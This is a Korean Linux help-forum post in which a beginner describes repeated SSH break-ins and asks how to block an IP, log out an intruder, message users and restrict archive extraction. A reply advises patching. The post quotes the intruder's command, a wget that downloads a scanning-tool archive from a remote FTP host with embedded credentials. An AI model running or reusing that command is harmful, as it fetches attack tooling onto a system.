질문&답변
클라우드/리눅스에 관한 질문과 답변을 주고 받는 곳입니다.
리눅스 분류

리눅스 보안좀 가르쳐 주세요

작성자 정보

• 김민기 작성
컨텐츠 정보

본문

전 리눅스 초보자 입니다.

그런데 얼마전 특정 아이피로 부터 해킹을 당했습니다.

ssh를 이용하여서 접속을 하엿고, 비밀번호는 어떻게 알았는지는 모르겠지만

게속 접속 해 있으면서 다음과 같은 명령을 사용하여 스캐닝 프로그램을 심고 계속 돌렷습니다.

wget ftp://zbind:boicea05@zbind.balder.prohosting.com/Fuckers.tgz

벌써 몇번째 침투를 해서 정말 신경쓰입니다.

어떻게 하면 침입을 막을수 있을지..좀 도와 주세요

제가 정말 필요한 명령어입니다. 좀가르쳐 주세요

1.  특정 아이피로 로그인 하는것을 차단 하는 방법이

2. 해커가 로그인 했을경우 로그인 한 아이디를 룻트가 로그아웃 시키는 방법

3. 로그인한 사용자에게 메세지를 뿌리는 방법

4.스캐닝 프로그램을 다운 받았지만 루트 권한이 아닌 사람은 압축을 풀지 못하게 하는 방법

위의 방법들은 제가 정말 필요한 방법들입니다.

그리고 제가 필요한 방법이외에 괜찮은 보안 테크닉 있으면 좀 가르쳐 주세요.

꼭 부탁 드립니다.

관련자료

강구원님의 댓글

• 강구원
안녕하세요 ^^; 아직은 미숙한 실력이지만,
혹시 리눅스 버젼 몇인지 알수있나요?
7.2버젼 사용시에는 passwd 오버클러, 발생으로 해킹 당할수있습니다.
최신 패치 해주세요

공지사항

뉴스광장

• 현재 회원수 :  60,041 명
  • 현재 강좌수 :  35,855 개
  • 현재 접속자 :  107 명